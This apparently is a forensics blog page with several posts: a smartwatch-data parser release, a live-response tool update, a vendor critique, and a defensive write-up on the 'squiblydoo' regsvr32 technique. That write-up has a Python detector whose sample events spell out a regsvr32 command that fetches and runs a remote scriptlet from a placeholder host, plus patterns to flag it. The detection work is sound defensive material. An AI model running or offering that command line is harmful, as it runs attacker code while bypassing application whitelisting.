<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>sudo cpan DBI DBD::SQLite DateTime IO::All</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Additionally, I would very much like to thank Jessica Hyde (<a href="https://twitter.com/B1N2H3X">https://twitter.com/B1N2H3X</a>) for helping me generate some test data and helping with code review and script output formatting. There is no way I would have been able to put this all together in 2 1/2 weeks without her help!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran (<a href="http://www.blogger.com/profile/10916463151597324052">Blogger profile</a>)<br />
<br />
<b style="font-size: x-large;">Public release of "allyourpebblearebelongtous" Perl script</b><br />
<span style="font-size: small;">Published 2016-06-24T12:52:00.000-04:00, updated 2016-06-24T15:19:27.796-04:00</span><br />
<br />
<span style="font-size: large;">Hello again readers and welcome back! This blog post is going to be fairly short, as the primary purpose is to publicly announce a new script, cleverly titled "allyourpebblearebelongtous.pl". This Perl script will allow the user to parse out data from a SQLite database associated with Pebble data stored on either an iOS or Android device, and present that information in an easy to read format. Please let me know if you have any questions or comments about the script. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you would like to see the slides from my SANS presentation, you <a href="http://www.slideshare.net/BriMorLabs/who-watches-the-smart-watches" target="_blank">can view them here</a>.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNlQepimS61BDx1F3tjKv8VXxap3S0JUJWbcFChLqC1qn5sh9vHoOEbdb5H4OP8pR7VPsmyfsfn79CDMo4cyXRXWwgh6JLVsMrUy0tU8qMIPO7DZMEWunrDzM7ySwxHTDMZr6bGHrALCH/s1600/Screenshot+2016-06-21+at+21.36.53.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNlQepimS61BDx1F3tjKv8VXxap3S0JUJWbcFChLqC1qn5sh9vHoOEbdb5H4OP8pR7VPsmyfsfn79CDMo4cyXRXWwgh6JLVsMrUy0tU8qMIPO7DZMEWunrDzM7ySwxHTDMZr6bGHrALCH/s640/Screenshot+2016-06-21+at+21.36.53.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Parsed notifications from Android device</i></span></td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCNHviTK0PQR9I91J3RWkUeVj5e5pZhtnRxoiFqN_iVUzV4hx_LfEDvGsCI-Rz_eX9NmuVyIJ31l6ji6_g6vvMyHGeoXL5DERko6jmJQ7-x9MQqBw7gnsZb6PS21WsVcstQyfbxbKU3w-d/s1600/Screenshot+2016-06-21+at+21.37.07.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCNHviTK0PQR9I91J3RWkUeVj5e5pZhtnRxoiFqN_iVUzV4hx_LfEDvGsCI-Rz_eX9NmuVyIJ31l6ji6_g6vvMyHGeoXL5DERko6jmJQ7-x9MQqBw7gnsZb6PS21WsVcstQyfbxbKU3w-d/s640/Screenshot+2016-06-21+at+21.37.07.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Parsed notifications from iOS device</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The script can be found on our newly created github account:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><a href="https://github.com/brimorlabs/allyourpebblearebelongtous">https://github.com/brimorlabs/allyourpebblearebelongtous</a></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Please note, in order to run the script you may have to install some Perl modules. On a Windows system, open a command prompt and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>ppm install DBI YAML DBD::SQLite Data::Plist DateTime IO::All</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">On a Linux system, open a terminal window and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<i><span style="font-size: large;">sudo cpan </span><span style="font-size: large;">DBI YAML DBD::SQLite Data::Plist DateTime IO::All</span></i><br />
<i><span style="font-size: large;"><br /></span></i><i><span style="font-size: large;"><br /></span></i>
<i><span style="font-size: large;"><br /></span></i><span style="font-size: large;">Additionally, I would like to thank Adrian Leong (</span><span style="font-size: large;"><a href="https://twitter.com/Cheeky4n6Monkey">https://twitter.com/Cheeky4n6Monkey</a>), Mari DeGrazia (<a href="https://twitter.com/maridegrazia">https://twitter.com/maridegrazia</a>), and Heather Mahalik (<a href="https://twitter.com/HeatherMahalik">https://twitter.com/HeatherMahalik</a>) for their help in gathering and testing the collected data. </span><br />
<br />Brian Moran (<a href="http://www.blogger.com/profile/10916463151597324052">Blogger profile</a>)<br />
<br />
<b style="font-size: x-large;">Very quick blog post on "squiblydoo"</b><br />
<span style="font-size: small;">Published 2016-04-22T14:12:00.001-04:00, updated 2016-04-24T08:43:00.194-04:00</span><br />
<span style="font-size: large;">Hello again readers, it has been busy over here for the past few months, but over the past few days there has been some really interesting research done by Casey Smith (<a href="https://twitter.com/subTee" target="_blank">@subTee</a>) regarding COM+ objects, specifically using <a href="https://technet.microsoft.com/en-us/library/bb490985.aspx" target="_blank">regsvr32</a> to access external sites (cough cough potentially malware), cleverly named "squiblydoo". <a href="http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html" target="_blank">The original blog post is here</a></span><span style="font-size: large;">. Apparently it leaves almost no trace on the system, for which I reference a <a href="https://twitter.com/bbaskin/status/723476447881531392" target="_blank">quick look at running it in Noriben</a>:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrIjCZ59eKad3_490bLefdsdUCmJhLfKHLkCO48h8A64gPTINM-Jp4O1IwNpYDc6T9fHhG3jnjGasg0SG3VjPk8doNIEMBeQMchadMbWS_vAggBpcz6PPuUHq8eTa6FQY6NSyVaKf2tOi7/s1600/basking-complus.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrIjCZ59eKad3_490bLefdsdUCmJhLfKHLkCO48h8A64gPTINM-Jp4O1IwNpYDc6T9fHhG3jnjGasg0SG3VjPk8doNIEMBeQMchadMbWS_vAggBpcz6PPuUHq8eTa6FQY6NSyVaKf2tOi7/s640/basking-complus.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Brian Baskin's tweet regarding results of Noriben looking at "squiblydoo"</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now, I am sure some of you are thinking, "so what, &lt;fill in thoughts here&gt;", because after all, several of the things in the past that we were supposed to get all spun up about (most recently, the debacle that was "badlock") have really turned out to be a lot of marketing hype and not much else. Well, this is something that you should take note of. Until/unless regsvr32 is modified to change the way that it works, there is very little left on the system itself to show that something bad happened. There have been several well respected experts weighing in on this issue (browsing for it will likely give you more information than you ever wanted to know) and the general consensus is that this is pretty worrying. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPIZkLztyhAZ6axAAeTcf8echbjq6PWIkElkEeVhQvAPscY0g2rC2s391Iq3Jzd_kvFreJTiZaMzA_sEtOt8oWqWw_L-PmCr0paqjynWhTK9wIRCODR1Pow7SlK2oXjX5yDvpq6qAIODrw/s1600/twitter.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPIZkLztyhAZ6axAAeTcf8echbjq6PWIkElkEeVhQvAPscY0g2rC2s391Iq3Jzd_kvFreJTiZaMzA_sEtOt8oWqWw_L-PmCr0paqjynWhTK9wIRCODR1Pow7SlK2oXjX5yDvpq6qAIODrw/s640/twitter.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Twitter weighs in on "</i><i>squiblydoo"</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">So, what to do? It is very likely that how often regsvr32 actually gets called depends on what you do in your environment. It really should never hit the internet, for anything (I will note that statement has not been fully determined yet), but what I have found to be the most successful solution thus far in limited testing is using the open source tool "<a href="http://en.michaeluno.jp/process-notifier/" target="_blank">Process Notifier</a>". It is pretty easy to set up: run the proper flavor (32 or 64 bit), choose "Processes to Monitor", then type "regsvr32.exe" as the process name to check, choose "Started" and click "Add", then "Apply" and "Save".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9zyBK9XNB5rHf3Sv0Lbwqjfn8GnUl3b-dOq2jkJpaU084po_KYxtJlVlQIRt99WxN98YuV3WiBsNs-76hVC5ueNUX8HGwGYRC-SUKFNPWSr_UiwKWknEKFF8t4q4BPEokulRNsV4TQE4T/s1600/procnot.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9zyBK9XNB5rHf3Sv0Lbwqjfn8GnUl3b-dOq2jkJpaU084po_KYxtJlVlQIRt99WxN98YuV3WiBsNs-76hVC5ueNUX8HGwGYRC-SUKFNPWSr_UiwKWknEKFF8t4q4BPEokulRNsV4TQE4T/s640/procnot.jpg" width="550" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Process Notifier options</span></i></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7YhSjbZVJOcsR6-9onFzX1HMeDzH0mrNHFC5VbTOIm2VqLcmarNqyDtC3Qg7ik4yfhvu4IaiL-aNk0r16ktULq7fGLttB-VJOmx66PGWcbyj43EHBN7fElPT1JrYD-vpcFm9aaNJbhYIn/s1600/proctomon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="588" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7YhSjbZVJOcsR6-9onFzX1HMeDzH0mrNHFC5VbTOIm2VqLcmarNqyDtC3Qg7ik4yfhvu4IaiL-aNk0r16ktULq7fGLttB-VJOmx66PGWcbyj43EHBN7fElPT1JrYD-vpcFm9aaNJbhYIn/s640/proctomon.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Adding regsvr32 to the processes to monitor list</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Then you can set up the email alerts under "E-mail Settings" by choosing your send-to email address, the message subject, and the message body, and you can even have it take a screenshot if you'd like under "Message". The next part is very important: under "SMTP" I highly recommend creating a one time throw away gmail account for this, because it does save the account password in plain text on the system. Once you have done all of these steps, again choose "Apply" and "Save".</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIpz8WyWttktXP2yTL7Nv37DiqHg_qwGwWHvv9YKLG-WbixUsK4euqn3zbsA5ti0oZKPy5TbmnxYFc4in1UnyRd6hi1HwYdz_7mMuhgeXLMzaGhVp37YtsdpdwZB_Pip3WyNwH-ibhqa0/s1600/message.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIpz8WyWttktXP2yTL7Nv37DiqHg_qwGwWHvv9YKLG-WbixUsK4euqn3zbsA5ti0oZKPy5TbmnxYFc4in1UnyRd6hi1HwYdz_7mMuhgeXLMzaGhVp37YtsdpdwZB_Pip3WyNwH-ibhqa0/s640/message.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"Message" options under E-mail Settings</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlt5H_7mrlwpZcmZ8895u6xelbCdDPJJxzmS7xHrCE-lla-unM3ROlV25xaLZ74mBziQCyJAMTq2r_e9rEsMKGxt7zE5sn_-ecQFGeyuBPpX56P-X4G31reMYZzX0VpAAk4eWvY9qxODU/s1600/smtp.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBlt5H_7mrlwpZcmZ8895u6xelbCdDPJJxzmS7xHrCE-lla-unM3ROlV25xaLZ74mBziQCyJAMTq2r_e9rEsMKGxt7zE5sn_-ecQFGeyuBPpX56P-X4G31reMYZzX0VpAAk4eWvY9qxODU/s320/smtp.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"SMTP" options under E-mail Settings</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtCtZ8H_iMfKURLLeRfLS_gAlyVkpVPcpG1433C18k4iS9DFyvB96FTr5n-yLeZUgQ8XhJOYhufVaPnS25ZEbO5JSSFdvZyM5mXfgMyIxPvxvc4Bo1V4uQsBbnp9dKwHFtgjPeyidbMCfg/s1600/emailnotif.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtCtZ8H_iMfKURLLeRfLS_gAlyVkpVPcpG1433C18k4iS9DFyvB96FTr5n-yLeZUgQ8XhJOYhufVaPnS25ZEbO5JSSFdvZyM5mXfgMyIxPvxvc4Bo1V4uQsBbnp9dKwHFtgjPeyidbMCfg/s640/emailnotif.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">My emailed alert on regsvr32, complete with screenshot!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkP-GMFDkyt_Iv3RKr2eyLXPZdchhbjbqi6kN-QJT2bA9kWwDjzIn8JWDyiJzjo8SjR9WyBRN-3v0GJCJe9QxSEACRJdFdpuxz8C5fZpfbPnb8UqFlOD09ERoHFcIqCF66-mNL7KowOXXn/s1600/sshot.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkP-GMFDkyt_Iv3RKr2eyLXPZdchhbjbqi6kN-QJT2bA9kWwDjzIn8JWDyiJzjo8SjR9WyBRN-3v0GJCJe9QxSEACRJdFdpuxz8C5fZpfbPnb8UqFlOD09ERoHFcIqCF66-mNL7KowOXXn/s640/sshot.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Command prompt running regsvr32 captured in the screenshot!</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">It is important to note that if this were used maliciously, having the alert on regsvr32 means it will take the screenshot when the process starts. So you may not see your shell (or whatever else was done) but you should see the site/file that it references. And even if it downloads malware that cleans up after itself and squiblydoo, the email should have been sent before that actually happens, so (fingers crossed) you will hopefully get a notification. And if you do get a notification, this would probably be a really good time to at least start gathering data from the system, most likely at least memory and volatile data (hmm...sounds like a good job for the <a href="https://www.brimorlabs.com/tools/" target="_blank">Live Response Collection</a>!)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Unfortunately this only works for finding regsvr32 and does not have the capability to look for URLs in the command line itself, but it should be a pretty useful quick check to see whether regsvr32 gets called at all. And if your environment actually does use regsvr32 on a regular basis (installers register COM DLLs with it all the time), this will get very noisy and a different solution will have to be found. It is also very important to remember that there still has to be a considerable amount of testing to try to remedy this situation, so this (or any other method) should only be a temporary fix until a long-term, viable solution is presented, which is what we are all working toward!</span><br />
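<span style="font-size: large;">To show what looking at the regsvr32 command line itself adds on top of a bare "regsvr32 started" alert, here is an added example that is not part of the original post and is not the alerting setup described above. It assumes you have process-creation telemetry that records the image, parent image and command line (Sysmon Event ID 1, or Security event 4688 with command-line auditing turned on); the events below are constructed for the example, and the IP and host names in them are documentation/reserved values. It flags the /i: argument pointing at an http(s) URL and scrobj.dll on the command line (the Squiblydoo pattern), raises the priority when an Office application is the parent, and keeps a plain local registration at "low" so routine installer noise does not page anyone.</span><br />

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events shaped like the fields Sysmon Event ID 1
# records (Image, ParentImage, CommandLine).  They are made up for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # routine: an installer registering a local COM DLL
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    },
    {   # Squiblydoo: a remote .sct scriptlet executed through scrobj.dll
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"regsvr32 /s /n /u /i:http://203.0.113.10/file.sct scrobj.dll",
    },
    {   # the same technique, but launched from a Word document
        "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
        "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
        "CommandLine": r'regsvr32.exe /s /i:"https://example.invalid/a.sct" C:\Windows\System32\scrobj.dll',
    },
    {   # unrelated process: must be ignored entirely
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"notepad.exe notes.txt",
    },
]

# /i:<arg> is handed to DllInstall; a URL there means regsvr32 fetches the scriptlet itself.
URL_IN_INSTALL_ARG = re.compile(r'/i:\s*"?(https?://[^\s"]+)', re.IGNORECASE)
SCROBJ = re.compile(r"scrobj\.dll", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_regsvr32(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a regsvr32 execution, or None for any other process."""
    if _basename(event["Image"]) != "regsvr32.exe":
        return None
    cmd = event["CommandLine"]
    reasons: List[str] = []
    url = URL_IN_INSTALL_ARG.search(cmd)
    if url:
        reasons.append("remote scriptlet via /i:" + url.group(1))
    uses_scrobj = SCROBJ.search(cmd) is not None
    if uses_scrobj:
        reasons.append("scrobj.dll on the command line (Squiblydoo)")
    if _basename(event["ParentImage"]) in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    if url or uses_scrobj:
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "low"  # plain local registration: keep the record, do not page anyone
    return {
        "severity": severity,
        "reasons": reasons,
        "url": url.group(1) if url else None,
        "parent": event["ParentImage"],
        "command_line": cmd,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run triage over a batch of events, dropping everything that is not regsvr32."""
    return [f for f in (triage_regsvr32(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["command_line"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

<span style="font-size: large;">Matching on the image basename only catches regsvr32 running under its real name; if your telemetry also carries the file hash or the original file name from the version resource, keying on those as well will survive a renamed copy. The "low" bucket is what you would review in aggregate rather than alert on, which is the practical answer to the noise problem in environments that register COM DLLs routinely.</span><br />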
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
Brian Moran<br />
<br />
<span style="font-size: large;"><b><u>Live Response Collection - Allosaurus</u></b></span><br />
<span style="font-size: small;"><i>Posted January 12, 2016 (updated October 17, 2019)</i></span><br />
<span style="font-size: large;">Hello readers and welcome back! Today we are proud to announce the newest round of updates to the Live Response Collection, specifically with a focus on some new features on the OSX side! </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;"><b><u>Improved OSX features!</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The biggest change is that the OSX version of the Live Response Collection now creates a memory dump using <a href="https://github.com/google/rekall/releases/" target="_blank">osxpmem</a>, as long as you run the program with root privileges. The script does the internal math, just like on the Windows side, to make sure that you have enough free space on your destination, regardless of whether it is an internal or external drive. I have encountered cases where OSX provides differently formatted results for the sizes (sometimes throwing in things like an equal sign or a random letter) and I tried to account for that as much as possible. If you encounter a bug with the memory dump please let me know and I will try to figure it out, but as I have done more and more work on the OSX side I have come to realize just how terrible OSX is. For example, some Apple programs do not work properly if they were created on Yosemite and are run on El Capitan...so much for "it just works"! If you encounter any issues I will try to get to the bottom of them as best as I can though!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The other main OSX feature is a topic that was briefly touched on during the <a href="https://www.youtube.com/watch?v=o7uSp8XVGLQ" target="_blank">Forensic Lunch on Friday</a>. Dave, Nicole, and James talked about the <a href="https://github.com/dlcowen/FSEventsParser" target="_blank">FSEvents Parser</a> that they wrote. If you run the script with root privileges it will copy the fseventsd data to the corresponding destination folder, and then you can run their tool to go through the data. (NOTE: It is best to transfer the data to a Windows machine to do this; otherwise the fseventsd data may be hidden from you, depending on how the access permissions on your machine are set.)</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b><u>A new naming scheme!</u></b></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As you may have noticed, the title is "Live Response Collection - <a href="http://www.nhm.ac.uk/discover/dino-directory/allosaurus.html" target="_blank">Allosaurus</a>". I decided to go with the names of dinosaurs to differentiate between Live Response Collection versions, which makes it easy to confirm that you are using the latest build and also helps with triaging any bugs that may pop up. Sometimes a bug that is reported has already been fixed in a newer release, but because of the old naming scheme, it wasn't immediately clear whether you were actually using the latest build. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">As always, please do not hesitate to contact me if you have any questions or comments regarding the Live Response Collection. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span><br />
<a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" style="font-size: x-large;" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><span style="font-size: large;"> </span><br />
<br style="font-size: x-large;" />
<span style="font-size: large;">MD5: 7bc32091c1e7d773162fbdc9455f6432</span><br />
<span style="font-size: large;">SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63</span><br />
<span style="font-size: large;">Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moran<br />
<br />
<span style="font-size: large;"><b><u>Cyber Security Snake Oil</u></b></span><br />
<span style="font-size: small;"><i>Posted January 7, 2016 (updated January 10, 2016)</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! Today's blog post is going to cover an instance of something which unfortunately occurs WAY too often in the cyber-security realm, especially on the topic of "threat intelligence" or "advanced analytics" or whatever other buzzwords the marketing folks are spinning now that it is 2016. I had originally planned to write this post toward the end of the month, but the more I thought about the whole incident the angrier I got, so I am posting it much earlier than I had anticipated.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The subject of today's post involves a very large company. I have redacted their name and information at the request of the company involved and will be referring to them as "Kelvarnsen Industries"; the external company involved I will call "Mountebank Labs". (<b>FULL DISCLOSURE:</b> I have not had any dealings, personally, with any member of Mountebank Labs but I have since spoken with several individuals who have). Apparently a few days ago, the CEO of Mountebank Labs sent an email to the CIO of Kelvarnsen Industries informing them of "an early warning about an email they have received (or are about to receive) that contained malware <i>[sic]</i>". A friend of mine works at Kelvarnsen Industries and asked my opinion about the email, which had been flagged internally by the CIO as a phishing attempt because his first name was wrong (not just spelled wrong, his name was actually wrong), the message contained a slew of grammatical errors and sentences that made no sense, and it referenced something that really did not seem possible. Honestly the most disturbing piece of the email sent from Mountebank Labs is that it appears they are actually targeting Kelvarnsen Industries in their "threat intelligence" platform:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQzBFTEy8xx4Luzt5a0CC87l0PTEdw1P5-0ls4YbBjNbAmGQGJW9FC320NCe44mbwJB9xt5-FykVAM8KbSKrOhZv4Swzw0CUlHH9yZlZ-cs52suWDKBQxZb1LcnQvBoMtkFTJKRdZNaO0/s1600/fakealert.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRQzBFTEy8xx4Luzt5a0CC87l0PTEdw1P5-0ls4YbBjNbAmGQGJW9FC320NCe44mbwJB9xt5-FykVAM8KbSKrOhZv4Swzw0CUlHH9yZlZ-cs52suWDKBQxZb1LcnQvBoMtkFTJKRdZNaO0/s640/fakealert.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">"Alert" information sent from Mountebank Labs CEO to Kelvarnsen Industries CIO</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I took a look at the referenced data and was able to easily determine it was an email that was sent ENTIRELY internally, as the policy at Kelvarnsen Industries is to upload suspected malicious emails with attachments directly to VirusTotal. Yes, you read that 100% correctly. The email appeared to come FROM a legitimate internal user, sent TO a legitimate internal user...because....wait for it....THAT IS EXACTLY WHAT HAPPENED!!!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To take a quote from their blog post, in which they wrote about this as a "win" (with my own comments added in <b>BOLD):</b></span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgctkYiqsr5yaE2B82_gBtEf80j7PZTx5iFN-9g3NfpW5-mzTfaHk1FVJCyQZD4G9cK7Z5GJQGw0n0lvCmV-CaKsSiTDMjA0c2lE7Ul5lDHHrE9OEA_-WnjOFixLLzhtKKU8CRPfX67Jw2S/s1600/blogquote.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgctkYiqsr5yaE2B82_gBtEf80j7PZTx5iFN-9g3NfpW5-mzTfaHk1FVJCyQZD4G9cK7Z5GJQGw0n0lvCmV-CaKsSiTDMjA0c2lE7Ul5lDHHrE9OEA_-WnjOFixLLzhtKKU8CRPfX67Jw2S/s640/blogquote.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Excerpt from blog post, with my own comments added</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
